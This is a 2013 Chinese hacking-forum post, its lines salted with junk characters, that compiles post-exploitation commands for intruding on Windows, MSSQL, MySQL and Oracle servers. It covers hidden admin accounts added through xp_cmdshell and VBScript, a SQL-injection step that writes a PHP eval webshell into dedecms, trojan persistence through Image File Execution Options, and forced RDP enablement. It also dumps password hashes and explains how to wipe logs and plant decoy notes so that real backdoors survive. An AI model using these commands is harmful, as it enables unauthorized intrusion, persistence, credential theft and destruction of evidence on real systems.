找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4863|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

& T. u8 P% `/ k" v3 y% h1.net user administrator /passwordreq:no- M8 u- o  E7 q8 W
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
1 _+ ?6 }4 ^; V' N2.比较巧妙的建克隆号的步骤, }# ]! x1 O7 G, Z5 V7 B
先建一个user的用户
. F/ E! v6 r6 V4 {7 U' p& X0 U然后导出注册表。然后在计算机管理里删掉
4 Q. Y5 I( ]( m在导入,在添加为管理员组
" G3 r+ @# l3 q; u) j9 a3.查radmin密码) b1 g. P3 O% \/ T* e6 e
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg  L- w4 K+ ]% U3 t' J, V$ A6 [
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]0 i8 j6 O& w7 H3 P
建立一个"services.exe"的项
, T5 ~4 w! V% N, r/ z再在其下面建立(字符串值)' v& u/ P: l/ Y0 h, |8 ?) Q0 A
键值为mu ma的全路径+ P# ]* M0 B7 V2 }+ x" ?3 H/ p' t7 b
5.runas /user:guest cmd
; z$ o9 n; A' V( z" y( G1 P9 B! y' H测试用户权限!
4 e9 ]/ J% l0 `' |8 Y7 c5 E0 G6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?* l  g) n1 p) t; x9 T+ ~7 _& C# \6 M
7.入侵后漏洞修补、痕迹清理,后门置放:
% {$ s" ]& T+ r# h: k; T3 J基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
3 ^( r. N* }1 C5 X1 N8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c4 I* V$ Q% y( f/ o

  R0 Y% ]- h& G# Z! R- efor example2 `2 R: u3 ]" A7 }, T& ~

) Q( D4 ~5 K: P5 n6 g3 w9 b. p+ |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'7 n7 |: L& f7 P: f+ r, o1 z

2 x$ z& a/ P/ b3 l! X  N1 Hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'  C" L7 {( k, p& b3 |

1 s2 Y. b  M! ?% {9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
& v7 d$ f5 \% B如果要启用的话就必须把他加到高级用户模式$ b( k+ p0 D/ y* D% S; [
可以直接在注入点那里直接注入
4 Y1 p; F3 I  B5 W3 X& l" t, c  A5 Yid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--8 n5 i0 q2 r3 I/ |8 k
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
& T. O4 A' z: K- ~' p或者3 u$ V4 x. [+ t
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
/ I; U" v" O& @) E+ }4 L! z! n. l来恢复cmdshell。' p; t  L$ ]) O1 h/ U. I
7 P; @2 K( f- i  @
分析器: @( v- t. h7 A8 X! b1 _
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
; T. ?+ l5 b8 v然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")3 z5 f9 k( _' X& i) {
10.xp_cmdshell新的恢复办法
4 M- B& `! p, ?- ^+ b& g% `xp_cmdshell新的恢复办法  R: D: l( W' l
扩展储存过程被删除以后可以有很简单的办法恢复:  @3 C' l: B- L# A$ }' M
删除
- |2 `+ U# R* w( v, A. Wdrop procedure sp_addextendedproc
8 X/ o4 k# r9 d* ]drop procedure sp_oacreate$ b! k8 k1 m3 m% S
exec sp_dropextendedproc 'xp_cmdshell'
' l9 P1 C/ v4 X
4 a. o. M, i  b+ K- e9 ^6 S恢复
: Q  P9 V+ P+ ^dbcc addextendedproc ("sp_oacreate","odsole70.dll")- W' M: Y( L% b  A  m5 q
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")# {; n2 A  R2 I% B/ J8 U
0 a; B) B  Z* a+ E% j1 u) I" `
这样可以直接恢复,不用去管sp_addextendedproc是不是存在' {/ [0 P( V2 ?/ I2 B) l' E4 M

1 Y6 _: U  C! g* _" d8 f- G# r-----------------------------
. `/ E( v1 A2 y% M; k7 }8 a- w# j8 ]( O$ r
删除扩展存储过过程xp_cmdshell的语句:1 b+ K1 I6 H- u8 S' G3 M. K
exec sp_dropextendedproc 'xp_cmdshell'& H* H( N+ R# u! {1 I
2 B" A! o% `# O: m" F8 [
恢复cmdshell的sql语句% l/ ]2 H1 Z2 a; ~, z" [
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
+ ~( o; x& z* \% z* X$ t3 T3 A: ^6 s1 i/ k) c9 f8 l7 E0 y
6 _: Y2 M& u4 u
开启cmdshell的sql语句
) j) i8 ^/ U7 Y9 M# l3 u
4 a9 A+ y* T: q! k4 @/ m1 k0 A, rexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
% u. J  J' k% q6 l
2 }+ P& }: W( O' ^# @判断存储扩展是否存在* W3 a3 K( {; i7 L* Z' o2 B# U; t' h
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'  N' [/ j( Y/ r/ S
返回结果为1就ok
9 J- z$ y( M5 G; R, S. F3 ]  K0 B! n+ s
恢复xp_cmdshell
/ ?$ u- J# k1 |$ {7 z. b9 Aexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
/ i4 J9 U0 c% k5 }6 M0 j0 F% L返回结果为1就ok
9 P8 V7 R& u; L# ?
1 w. D$ i& ]% n' D; H5 \否则上传xplog7.0.dll
( E2 b, c' u3 D3 ~; Y0 fexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'! K: ]8 `9 q! d; \

. ?5 ~3 I/ _* X0 v1 I$ _堵上cmdshell的sql语句
3 {! [) U: s0 y, V" j1 Nsp_dropextendedproc "xp_cmdshel1 s' e' k# V+ J
-------------------------2 ?  Y8 Q$ _0 q( _( P
清除3389的登录记录用一条系统自带的命令:+ n; U* i7 W. _
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
; M9 |5 \9 S: a' G( N. i- k' b, v* n* n. ^
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件, v, n- `% x  d" V% q
在 mysql里查看当前用户的权限# p) Z# h& x* A& {8 K# G# f) Z
show grants for  
0 G2 L$ C' Z2 C$ N# ~1 b
* G3 s) k1 O. w( ?9 W* R以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
0 i- @, X7 l* j2 L: w# j
0 t2 s2 y1 B* W, ?/ u" a
7 w' E2 R# [7 f7 RCreate USER 'itpro'@'%' IDENTIFIED BY '123';7 R. X1 D# u* T5 T* D
1 }' j4 U! |- |
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
' u, N3 F- i- U: L9 j
6 N8 ^  R" u; e, QMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0) ?7 P, {; O5 t

3 F) g& O+ w% ?) b' l. X' i! N" ?1 GMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;3 Z% e( H. D) u
3 u# @5 |/ s/ [/ m7 }+ g
搞完事记得删除脚印哟。% b/ m# e: ~% r

1 ^) J9 Q0 w, N$ d1 M' s  wDrop USER 'itpro'@'%';0 p1 D, S) C3 P' u( U

" M/ y6 V) _- K' L% iDrop DATABASE IF EXISTS `itpro` ;5 y$ y5 z! t3 K2 {; I
6 q2 T9 q* u) v1 b* V3 Y# Q) W/ I
当前用户获取system权限
" K' P9 r& }1 J3 \) H  u4 psc Create SuperCMD binPath= "cmd /K start" type= own type= interact
  H8 w# ^" T0 s: Z. R0 isc start SuperCMD
1 r6 g0 t+ u2 X: s0 P5 n* \程序代码2 E6 }( h: ?5 o( u/ B& c  _9 Q
<SCRIPT LANGUAGE="VBScript">
2 ]& T" o2 {: E  G7 m; sset wsnetwork=CreateObject("WSCRIPT.NETWORK")
% I/ T& @/ ?8 m! k+ J; i. b  hos="WinNT://"&wsnetwork.ComputerName
; }" y; f- m( x; {7 P) P. D9 vSet ob=GetObject(os)1 ?: @' p5 O! ?
Set oe=GetObject(os&"/Administrators,group")# M) H# K0 R- d/ f9 C! A. g$ P
Set od=ob.Create("user","nosec")# w# w2 ^6 P- N  L" n
od.SetPassword "123456abc!@#"6 Q4 I$ t9 P' t6 n7 E3 W5 t
od.SetInfo" K( A) O& j, l. Z6 h
Set of=GetObject(os&"/nosec",user)
9 Y! d9 W+ Y) y1 T% P( X# M6 }oe.add os&"/nosec"
6 ~( k7 r$ V! ]) o* A</Script># W1 F% o* w' t
<script language=javascript>window.close();</script>4 ]" r1 |4 n; X; W, }# u

' D" v+ \6 v/ T) I: Z& T
$ u- N3 T5 a  W8 ^0 O. d  C3 m, h% i: W; g5 {
5 G$ ~$ _% q: D" |$ O* L
突破验证码限制入后台拿shell
  b6 x/ a$ T. Q; {2 e  m  f; l程序代码
9 H4 Q9 {3 O" }2 V. N6 }( wREGEDIT4 0 i) e/ j0 I4 B# q8 J
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
; u0 r6 |2 M1 O% b! j6 J2 I"BlockXBM"=dword:00000000
1 x6 e) b  I! j- g7 J6 b- |2 w/ \2 Z
保存为code.reg,导入注册表,重器IE
! f! M/ s9 o) o就可以了
8 G$ p; _  y, n) L6 Zunion写马9 u/ p/ E/ b! B0 ?7 ^
程序代码
8 ]. M; G4 s1 e! \! ]' Q+ `www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*# b( N# M' G& c! X4 S" }- o
1 E2 g3 ]) u- }. o) j. D0 s
应用在dedecms注射漏洞上,无后台写马
# Z: _8 l  c. Ededecms后台,无文件管理器,没有outfile权限的时候$ w2 j" W+ n  U$ t. N. d
在插件管理-病毒扫描里6 f/ q+ x5 J5 B4 C2 L3 \7 @
写一句话进include/config_hand.php里
# p4 N0 O1 e$ H5 N; p! y6 S' r程序代码7 ?) S/ r/ X5 d2 N* D
>';?><?php @eval($_POST[cmd]);?>7 `( R8 Y% \$ o* F

: g2 f1 p  w7 U9 i% D
( X- c: t* N3 ]/ X" y如上格式. ?" T) q8 E+ R' |0 z; o- L5 ?

: l1 B: b. k, Poracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解& v; F4 e1 a5 S( l9 t
程序代码
- H6 k- T, ^- W4 W. S* E/ cselect username,password from dba_users;
& o% m( W% Z5 `3 {) D* z  W) |$ d7 x1 T6 b$ s/ [
& }' Z& S7 h) B! x5 z6 A0 j
mysql远程连接用户0 t% L- k9 h! {* _9 l) `
程序代码
  h' }/ t9 E. Z, k" ^7 |2 ?/ y$ w* X* J1 S. G2 b
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';7 o1 F3 P0 K$ L( [& b
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
* l% O  L% U! \7 ]9 N; ?* MMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 06 h' l8 E* }# R. V
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
* V+ j3 ]* b2 Z7 m- _. R/ L4 L* R  Q" ?  b/ r

  k' |. ]. b5 E; J6 T. f8 @  S+ ]" R3 u! Y- r1 B. M

6 p! L! l9 `/ F4 {4 iecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 09 f' y3 N( l1 O& F% E, }
- A! E# ^) u# j4 \  J. e! _
1.查询终端端口* Q5 x- K5 u6 F; W: l8 F
0 \" E, W/ N0 o9 S7 ~: K
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
; x! b  I9 [3 h, z9 \; z
3 C  h5 ~! {" Q0 f6 o1 s通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
: c% M: I: s" J3 c# Z% @type tsp.reg
, G2 W/ [- Y  k+ |! B" Z' J/ q) w- s
2.开启XP&2003终端服务
5 X4 I  s" t& P, d# E, t- r* S: c. v& K2 y, x

+ E0 O9 g: k2 pREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f6 B8 Q% I* p! \2 j7 _! T
) k1 X% W# {9 u4 H1 y

$ P) O4 c# Z: T$ P% r! i+ l( B3 tREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
% |' Q; F" F. _0 N, p; Z3 @
/ v* a5 \/ {5 @. w$ S3.更改终端端口为20008(0x4E28)3 X7 a% Y2 e" M0 K3 U3 S

8 _. |8 ^" Y# F) [( Y6 M- ?# `; XREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
/ Y! c- p' c' D; N7 B
; l5 h$ q' h# k* I* G* R! aREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f/ a  j5 M" `- _& k( q
+ z( K; n/ l/ n2 D2 }( J
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
1 S2 X; b* p( V# f3 t0 x$ S6 ]& l; b+ e% L7 B4 Q
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
+ p0 ^: a5 \& I$ h; `
9 {! s4 e% M1 k4 Q$ F, f
0 v+ l- q% G7 V' {+ ~. O5.开启Win2000的终端,端口为3389(需重启)
/ T) Q) ^3 N3 @  d% B  R5 Z- X" r+ Z8 n+ h3 f' _  ^
echo Windows Registry Editor Version 5.00 >2000.reg . A4 u4 L  L" Q9 u3 D0 c& h6 h
echo. >>2000.reg6 ^5 X+ p3 }2 P: v( z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg / ]+ \" d8 Z6 u" X
echo "Enabled"="0" >>2000.reg : F* ]# N! L: ~% D! G! V
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
) ?6 n# j% f  `; {% \+ N7 recho "ShutdownWithoutLogon"="0" >>2000.reg
5 r' K) _7 m. q$ ?1 c: secho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
' n  T" S5 m2 A( ~3 w5 recho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
: R2 b, i% w' B2 F) G0 vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ; H/ v9 z. A; L! ?7 U" w3 g
echo "TSEnabled"=dword:00000001 >>2000.reg ) n% q; p& s2 @1 ^( e* t1 k' B
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ! h; R, T0 I5 }6 b
echo "Start"=dword:00000002 >>2000.reg ; |! U( H+ N6 h! j
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
/ I9 n" ?% }  \3 iecho "Start"=dword:00000002 >>2000.reg   E+ Z5 ?! o, v4 E! S- m( ^
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
: D6 \+ n/ D! G5 C4 secho "Hotkey"="1" >>2000.reg
+ s: _4 K+ k" q9 Z% n# k: p: xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 7 F; R: g3 \  ^) v# c
echo "ortNumber"=dword:00000D3D >>2000.reg
5 k9 ~9 s# w2 v& Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
* a8 V7 z; q/ x4 }' C, D! fecho "ortNumber"=dword:00000D3D >>2000.reg
2 E0 w# s' S4 t2 u/ n
. K3 V* q6 S' N3 K6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
% [0 v& N/ B/ o$ _
2 N5 d: I  ?9 i  P& W* j@ECHO OFF & cd/d %temp% & echo [version] > restart.inf. W% D  N7 b) U# ^
(set inf=InstallHinfSection DefaultInstall)& b. d/ ]7 Q3 W7 [
echo signature=$chicago$ >> restart.inf
+ U. R* _. r7 |echo [defaultinstall] >> restart.inf
8 M+ h" l0 i, q& Z7 B6 ]  Urundll32 setupapi,%inf% 1 %temp%\restart.inf9 w7 n0 \4 g9 Q5 p. S

8 Q& A# o1 c# A
, |6 y  U9 m3 _  Q7.禁用TCP/IP端口筛选 (需重启), Y2 F+ n4 O6 e8 V

) U3 x( ?( k8 N8 g" Z; ^4 s9 P( hREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
! ]2 F" O$ O- d, v& O9 ]
6 I- I& Y+ B, }8.终端超出最大连接数时可用下面的命令来连接
: y) [, {1 S8 _: R& U; S3 i4 o- Y9 `
mstsc /v:ip:3389 /console
# |4 N) a& M: C% |
: |& o; {$ ]5 X3 w- {, r$ v9.调整NTFS分区权限
2 F- D7 B! A& W7 y- U# t' f7 p3 J; J$ a' c
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
; n' o2 t( ]0 \4 f9 V' e6 t
, p, P# v2 l9 t! p% Ucacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)9 l7 H- T1 g; O& T

7 o/ y0 s$ }% {( J' g! ~/ n) F------------------------------------------------------
8 K' [! u* g# q+ ~% M3389.vbs + P5 Q' [9 U' G: S
On Error Resume Next
* b7 N0 @/ k1 J6 Z4 O( P8 Lconst HKEY_LOCAL_MACHINE = &H800000024 N: x3 i$ y1 |/ i
strComputer = ".": Z& c! L% }) P7 e- o
Set StdOut = WScript.StdOut+ |. o' F1 i& j/ b  W& w
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_# a$ ]. j+ C! L* q% g5 t$ x" s
strComputer & "\root\default:StdRegProv")" N- M$ v. C  t( h9 |3 s9 s  S3 |$ l
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server": f: W, W' L" J5 g2 r
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath3 I9 v5 ?1 d+ h* \- ?) ?0 q
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"+ E* ^! U0 B/ L3 _5 G3 l
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
4 D3 v& w# L- r* K+ }8 e. ustrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp": ]: B2 K$ w$ F  v. e
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
& @# C# _/ ?6 L3 L& m4 PstrValueName = "fDenyTSConnections"
2 W' e3 p3 s) d3 S4 I& ldwValue = 0
- a  ~  _7 H" D5 m7 joreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue' f! R4 ^5 R! t
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
0 \: G2 l- B$ ~. w* RstrValueName = "ortNumber"% M! \. k  @7 y; m; k9 ?' A
dwValue = 3389) T5 K% c) g6 w  G$ J* G% [
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue5 t% P5 s* i, @) @
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"' k- _* d0 Y' o$ q
strValueName = "ortNumber"
9 ~  M) a9 ^: WdwValue = 3389* U7 }7 w; m, `+ V3 B
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue1 E8 x6 A, L$ D- e
Set R = CreateObject("WScript.Shell")
5 w3 Q9 _; U, u( b$ s: ]R.run("Shutdown.exe -f -r -t 0")
" k0 c5 k6 w4 ^
; B) [# ^8 |5 w2 [删除awgina.dll的注册表键值
" W* [7 q7 F' T& z( A程序代码
, ?+ M  O! R; x+ d( t! T% @
9 k7 u+ @* A# m; G* L3 i1 W: d; [/ D1 |reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
+ a7 Z8 g* S, `, M# M+ J% n4 w
! q& Q5 N' b; M5 i/ ~1 [7 x5 H4 d- n. _( f/ L8 b8 G8 w

7 r; ~: l* r7 H6 Z1 ?5 Q9 I, E7 n+ y
# @  g& O- c6 k8 j4 Y3 f程序代码# v5 r! C2 V- H. W8 ^4 t8 a
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
3 J: V& B- s$ L: S: U% o" {, x+ R6 F0 o. c; y
设置为1,关闭LM Hash% M- [3 k& y( ^! C7 V, ]2 k, Y! ~7 ^

$ y: `. y6 H1 G& Z数据库安全:入侵Oracle数据库常用操作命令
% u# q( h4 X& E+ n" M$ W最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。: v  s7 T+ B/ J! V
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。( o% y- J0 }( c
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
- |7 v2 N$ g- X$ O/ W+ y  c3、SQL>connect / as sysdba ;(as sysoper)或8 Q5 |+ U5 N0 K
connect internal/oracle AS SYSDBA ;(scott/tiger)- ~9 Z' J5 ~5 `+ u
conn sys/change_on_install as sysdba;# q5 {6 s. k8 j1 U; F, {
4、SQL>startup; 启动数据库实例% {1 g) P' T& P+ f
5、查看当前的所有数据库: select * from v$database;
( S* C( \9 I7 V* _: a- H4 k4 _select name from v$database;; n; k3 R% K; N+ Z
6、desc v$databases; 查看数据库结构字段; A1 ]  f4 r2 M; r% _
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:% S7 \* A4 ]6 x$ B+ `
SQL>select * from V_$PWFILE_USERS;) F7 Z; U' v: w" g/ C& y- v
Show user;查看当前数据库连接用户
1 o4 D6 _1 w! X& P  q8、进入test数据库:database test;
, U5 {+ I  H6 V; h9、查看所有的数据库实例:select * from v$instance;8 ]) p( m. o# d7 ?( w8 j1 z8 E  |
如:ora9i! J0 Z+ C- Q, T- v- b: [% C) t
10、查看当前库的所有数据表:: B! s( _9 N9 G$ z6 T5 e8 }
SQL> select TABLE_NAME from all_tables;
, l- q4 P$ f; R8 h3 a, b# P" B( Vselect * from all_tables;
$ [$ r2 j6 _# MSQL> select table_name from all_tables where table_name like '%u%';
6 k* }8 `& I2 K2 I" ]* z! l  iTABLE_NAME
+ a6 {7 x* |% `) q& C" e. V------------------------------7 u! A% K1 f; W. H! e* L- V2 E) r; @
_default_auditing_options_
4 l9 G( E& I$ D1 D11、查看表结构:desc all_tables;+ b& k7 {' ^; ]; Z/ j5 \2 v
12、显示CQI.T_BBS_XUSER的所有字段结构:9 N& I4 P) @: T& W8 ^* M6 L
desc CQI.T_BBS_XUSER;% x. c$ Q/ i: S1 t, j# ?* W
13、获得CQI.T_BBS_XUSER表中的记录:- k* c8 q; Y4 c1 O+ C9 ?3 _6 M- ]
select * from CQI.T_BBS_XUSER;
2 {+ h3 i4 i% ?( B14、增加数据库用户:(test11/test)
" A$ M) A  |) t! x. r; Vcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
( A3 t) H, }- x7 |$ F15、用户授权:! m: _; R! X$ k
grant connect,resource,dba to test11;, S9 a, }4 ?3 M/ m( w9 A. ^/ i
grant sysdba to test11;
3 w0 U3 L4 {: C) }) Kcommit;# m. `; @% p. s  ^8 E4 S
16、更改数据库用户的密码:(将sys与system的密码改为test.)
/ A/ o+ I. O) \alter user sys indentified by test;6 `1 }% Z7 g9 k: A4 n
alter user system indentified by test;; e* n9 ?  E; O2 f7 ~8 G& H) W! o9 t! g5 B
# \; e1 y: f7 b. @7 h* {
applicationContext-util.xml
9 ]7 t; a+ K4 D1 E# CapplicationContext.xml4 i( L# l! a7 w, x- c6 j
struts-config.xml
7 y6 Z* x2 j7 f+ D, _web.xml" l; D9 H- \7 }' I
server.xml' G+ w) \' c0 s. D  g) z
tomcat-users.xml
, Z% Y0 V( q/ t. L# w5 B3 ^hibernate.cfg.xml
& r0 _9 x5 h/ e5 C' ]0 vdatabase_pool_config.xml( v& q! g4 Y$ W" O+ b7 i6 a
. y' A- m6 [; t) N  n. @

5 J/ _6 C8 P( G( v, ~# c" D" @. k& p\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置) e8 C- ^' g1 N1 q9 X0 R- K
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini* m/ @0 q9 M% G4 m& e, B
\WEB-INF\struts-config.xml  文件目录结构- t: g, Y* f: e, ]9 n
" Z6 L1 k& C1 A& R  f4 l
spring.properties 里边包含hibernate.cfg.xml的名称  F6 P2 @$ N6 V% @2 L/ Y' I
4 S; N* F. D0 _5 @

  {; P1 f& {1 f7 b$ H8 aC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml3 z  A/ K9 ?$ |( e* B8 i6 e, C2 X

  T" t5 A, \& A& }6 h, Z如果都找不到  那就看看class文件吧。。3 n- U" C0 B/ B7 R7 e
+ e2 E3 }$ z2 s# @; d5 B
测试1:& g) Y  B' v( Y# o$ D' ^
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
; x* i0 Y3 C( `8 |* H) q4 J# O* [: ]( z
测试2:
) {6 O/ K2 s% ~+ i3 S- _( Q, z/ ?+ @; B
create table dirs(paths varchar(100),paths1 varchar(100), id int)
+ a, x8 J( r) Y" ~2 b  f# N7 L* n5 O, m
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--0 R* a$ [+ `+ r( v& C2 {

4 H1 Q( a4 x. w. \( ySELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
: N+ I- C( Y% _6 {6 F5 `! X3 [$ ?) N: \
查看虚拟机中的共享文件:
+ m0 B0 c8 t$ d" m* J, ~8 _, g在虚拟机中的cmd中执行
7 Z, b4 _& W6 [- O\\.host\Shared Folders
" o- d& }3 a7 u1 N. a  g6 u/ y% F: n" {: W1 b
cmdshell下找终端的技巧' |6 j" l' X3 ~. [: [' k( a" @
找终端: / p* ^  |3 c. @0 W2 ?
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
# ?) O: [" P$ T! D$ y- \6 @; u$ H) H   而终端所对应的服务名为:TermService
, h" W7 K% d: d* w8 g, y! Q第二步:用netstat -ano命令,列出所有端口对应的PID值!
# n# K3 B9 H/ `' B   找到PID值所对应的端口
( f: N% f" G8 R/ Z' R
  u; k  f" F) y1 Z" O* y- b9 j查询sql server 2005中的密码hash
9 B* J" Q( Y" P; R& R! G! m# t# o% DSELECT password_hash FROM sys.sql_logins where name='sa'9 B2 ^+ M) U3 m
